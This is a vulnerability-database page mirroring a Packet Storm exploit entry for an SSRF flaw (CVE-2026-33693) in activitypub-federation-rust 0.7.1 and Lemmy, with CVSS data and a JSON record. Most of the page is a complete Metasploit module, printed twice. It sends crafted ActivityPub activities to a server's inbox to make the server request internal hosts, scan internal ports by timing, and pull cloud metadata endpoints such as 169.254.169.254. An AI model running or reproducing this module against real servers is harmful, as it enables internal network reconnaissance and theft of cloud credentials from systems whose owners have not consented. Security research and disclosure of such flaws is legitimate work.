📄 Activitypub-federation-rust 0.7.1 Server-Side Request Forgery_PACKETSTORM:219062

6.5 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Description

This is a server-side request forgery scanner for Activitypub-federation-rust version 0.7.1...

Visit Original Source

Basic Information

ID PACKETSTORM:219062

Published Apr 17, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Activitypub-federation-rust 0.7.1 Lemmy ActivityPub SSRF Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/LemmyNet/activitypub-federation-rust/releases |
==================================================================================================================================

[+] Summary : This Metasploit auxiliary module targets a Server-Side Request Forgery (SSRF) vulnerability in Lemmy / ActivityPub implementations using the activitypub-federation-rust 0.7.1 library.
The issue allows crafted ActivityPub messages to trigger server-side requests to internal or restricted network resources.

[+] POC :

require 'json'
require 'time'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Lemmy ActivityPub SSRF (CVE-2026-33693)',
'Description' => %q{
Exploits SSRF via ActivityPub using 0.0.0.0 bypass.

Designed for CTF and controlled environments.
},
'Author' => ['indoushka'],
'References' => [
['CVE', '2026-33693']
],
'DisclosureDate' => '2026-03-23',
'License' => MSF_LICENSE
)
)

register_options([
OptString.new('TARGET_URI', [true, 'Base path', '/']),
OptString.new('INTERNAL_HOST', [true, 'Internal host', '0.0.0.0']),
OptString.new('INTERNAL_PORT', [false, 'Internal port']),
OptString.new('INTERNAL_PATH', [false, 'Internal path']),
OptEnum.new('ATTACK_TYPE', [true, 'Attack type',
'SINGLE', ['SINGLE','PORT_SCAN','METADATA']]),
OptString.new('PORTS', [false, 'Ports list', '80,443,8080']),
OptInt.new('SCAN_DELAY', [false, 'Delay', 1]),
OptBool.new('VERBOSE', [false, 'Verbose', false])
])
end

def run
print_status("Starting SSRF module")

case datastore['ATTACK_TYPE']
when 'SINGLE'
single_ssrf_attack
when 'PORT_SCAN'
port_scan_attack
when 'METADATA'
metadata_attack
end
end

def target_url
proto = datastore['SSL'] ? 'https' : 'http'
host = datastore['RHOSTS']
"#{proto}://#{host}:#{datastore['RPORT']}"
end

def create_payload(url)
{
'@context' => 'https://www.w3.org/ns/activitystreams',
'type' => 'Create',
'id' => "#{target_url}/test-#{rand(9999)}",
'actor' => 'https://attacker.com/actor',
'to' => ['https://www.w3.org/ns/activitystreams#Public'],
'object' => {
'type' => 'Note',
'attachment' => [
{
'type' => 'Link',
'href' => "http://#{url}"
}
]
}
}
end

def send_ssrf(url)
begin
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGET_URI'], 'inbox'),
'ctype' => 'application/activity+json',
'data' => create_payload(url).to_json
)

return res
rescue => e
vprint_error("Error: #{e}")
return nil
end
end

def single_ssrf_attack
host = datastore['INTERNAL_HOST']
port = datastore['INTERNAL_PORT']
path = datastore['INTERNAL_PATH']

url = host
url += ":#{port}" if port
url += "/#{path}" if path

print_status("Targeting #{url}")

res = send_ssrf(url)

if res
print_good("Response: #{res.code}")
print_line(res.body[0..200]) if res.body
else
print_error("No response")
end
end

def port_scan_attack
ports = datastore['PORTS'].split(',').map(&:to_i)
host = datastore['INTERNAL_HOST']

open_ports = []

ports.each do |p|
url = "#{host}:#{p}"
start = Time.now

res = send_ssrf(url)
elapsed = Time.now - start

if res && res.code != 404 && elapsed > 0.2
print_good("Port #{p} OPEN (#{res.code})")
open_ports << p
else
vprint_status("Port #{p} closed")
end

sleep datastore['SCAN_DELAY']
end

print_good("Open ports: #{open_ports.join(', ')}") unless open_ports.empty?
end

def metadata_attack
targets = [
"0.0.0.0/latest/meta-data/",
"0.0.0.0/computeMetadata/v1/",
"0.0.0.0/169.254.169.254/latest/"
]

targets.each do |t|
print_status("Trying #{t}")

res = send_ssrf(t)

if res && res.code == 200 && res.body
print_good("Metadata FOUND")
print_line(res.body[0..200])
else
vprint_status("No data")
end

sleep 1
end
end

def vprint_status(msg)
print_status(msg) if datastore['VERBOSE']
end

def vprint_error(msg)
print_error(msg) if datastore['VERBOSE']
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-17T17:27:38",
    "description": "This is a server-side request forgery scanner for Activitypub-federation-rust version 0.7.1...",
    "published": "2026-04-17T00:00:00",
    "modified": "2026-04-17T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Activitypub-federation-rust 0.7.1 Server-Side Request Forgery",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219062",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-33693"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Activitypub-federation-rust 0.7.1 Lemmy ActivityPub SSRF Scanner                                                 |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://github.com/LemmyNet/activitypub-federation-rust/releases                                                 |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Metasploit auxiliary module targets a Server-Side Request Forgery (SSRF) vulnerability in Lemmy / ActivityPub implementations using the activitypub-federation-rust 0.7.1 library. \n                     The issue allows crafted ActivityPub messages to trigger server-side requests to internal or restricted network resources.\n    \n    \n    [+] POC        :  \n    \n    require 'json'\n    require 'time'\n    \n    class MetasploitModule < Msf::Auxiliary\n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Auxiliary::Scanner\n      include Msf::Auxiliary::Report\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Lemmy ActivityPub SSRF (CVE-2026-33693)',\n            'Description' => %q{\n              Exploits SSRF via ActivityPub using 0.0.0.0 bypass.\n    \n              Designed for CTF and controlled environments.\n            },\n            'Author' => ['indoushka'],\n            'References' => [\n              ['CVE', '2026-33693']\n            ],\n            'DisclosureDate' => '2026-03-23',\n            'License' => MSF_LICENSE\n          )\n        )\n    \n        register_options([\n          OptString.new('TARGET_URI', [true, 'Base path', '/']),\n          OptString.new('INTERNAL_HOST', [true, 'Internal host', '0.0.0.0']),\n          OptString.new('INTERNAL_PORT', [false, 'Internal port']),\n          OptString.new('INTERNAL_PATH', [false, 'Internal path']),\n          OptEnum.new('ATTACK_TYPE', [true, 'Attack type',\n            'SINGLE', ['SINGLE','PORT_SCAN','METADATA']]),\n          OptString.new('PORTS', [false, 'Ports list', '80,443,8080']),\n          OptInt.new('SCAN_DELAY', [false, 'Delay', 1]),\n          OptBool.new('VERBOSE', [false, 'Verbose', false])\n        ])\n      end\n    \n      def run\n        print_status(\"Starting SSRF module\")\n    \n        case datastore['ATTACK_TYPE']\n        when 'SINGLE'\n          single_ssrf_attack\n        when 'PORT_SCAN'\n          port_scan_attack\n        when 'METADATA'\n          metadata_attack\n        end\n      end\n    \n      def target_url\n        proto = datastore['SSL'] ? 'https' : 'http'\n        host = datastore['RHOSTS']\n        \"#{proto}://#{host}:#{datastore['RPORT']}\"\n      end\n    \n      def create_payload(url)\n        {\n          '@context' => 'https://www.w3.org/ns/activitystreams',\n          'type' => 'Create',\n          'id' => \"#{target_url}/test-#{rand(9999)}\",\n          'actor' => 'https://attacker.com/actor',\n          'to' => ['https://www.w3.org/ns/activitystreams#Public'],\n          'object' => {\n            'type' => 'Note',\n            'attachment' => [\n              {\n                'type' => 'Link',\n                'href' => \"http://#{url}\"\n              }\n            ]\n          }\n        }\n      end\n    \n      def send_ssrf(url)\n        begin\n          res = send_request_cgi(\n            'method' => 'POST',\n            'uri' => normalize_uri(datastore['TARGET_URI'], 'inbox'),\n            'ctype' => 'application/activity+json',\n            'data' => create_payload(url).to_json\n          )\n    \n          return res\n        rescue => e\n          vprint_error(\"Error: #{e}\")\n          return nil\n        end\n      end\n    \n      def single_ssrf_attack\n        host = datastore['INTERNAL_HOST']\n        port = datastore['INTERNAL_PORT']\n        path = datastore['INTERNAL_PATH']\n    \n        url = host\n        url += \":#{port}\" if port\n        url += \"/#{path}\" if path\n    \n        print_status(\"Targeting #{url}\")\n    \n        res = send_ssrf(url)\n    \n        if res\n          print_good(\"Response: #{res.code}\")\n          print_line(res.body[0..200]) if res.body\n        else\n          print_error(\"No response\")\n        end\n      end\n    \n      def port_scan_attack\n        ports = datastore['PORTS'].split(',').map(&:to_i)\n        host = datastore['INTERNAL_HOST']\n    \n        open_ports = []\n    \n        ports.each do |p|\n          url = \"#{host}:#{p}\"\n          start = Time.now\n    \n          res = send_ssrf(url)\n          elapsed = Time.now - start\n    \n          if res && res.code != 404 && elapsed > 0.2\n            print_good(\"Port #{p} OPEN (#{res.code})\")\n            open_ports << p\n          else\n            vprint_status(\"Port #{p} closed\")\n          end\n    \n          sleep datastore['SCAN_DELAY']\n        end\n    \n        print_good(\"Open ports: #{open_ports.join(', ')}\") unless open_ports.empty?\n      end\n    \n      def metadata_attack\n        targets = [\n          \"0.0.0.0/latest/meta-data/\",\n          \"0.0.0.0/computeMetadata/v1/\",\n          \"0.0.0.0/169.254.169.254/latest/\"\n        ]\n    \n        targets.each do |t|\n          print_status(\"Trying #{t}\")\n    \n          res = send_ssrf(t)\n    \n          if res && res.code == 200 && res.body\n            print_good(\"Metadata FOUND\")\n            print_line(res.body[0..200])\n          else\n            vprint_status(\"No data\")\n          end\n    \n          sleep 1\n        end\n      end\n    \n      def vprint_status(msg)\n        print_status(msg) if datastore['VERBOSE']\n      end\n    \n      def vprint_error(msg)\n        print_error(msg) if datastore['VERBOSE']\n      end\n    end\n    \n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219062",
    "cvss": {
        "score": 6.5,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219062/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply